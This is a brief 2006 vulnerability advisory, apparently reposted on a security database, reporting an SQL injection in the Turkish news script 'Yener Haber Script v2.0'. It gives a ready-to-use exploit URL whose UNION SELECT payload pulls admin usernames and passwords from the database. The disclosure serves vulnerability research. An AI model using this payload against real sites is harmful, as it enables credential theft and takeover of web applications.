Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14544
HistoryOct 04, 2006 - 12:00 a.m.

Yener Haber Script v2.0 SQL injection

2006-10-0400:00:00
vulners.com
9

BiyoSecurity.Org

script name : Yener Haber Script v2.0

Demo : http://www50.brinkster.com/yenerturk

Risk : High

Regards : Dj_ReMix

Thanks : Korsan , Liz0zim , TR_IP

Exploit :

http://victim.com/?x=2&kategori=11&id=-1%20union+select+id,kullanici_adi,sifre,4,5,6,7,8,9+from+admin

Admin Pass Displayed :=)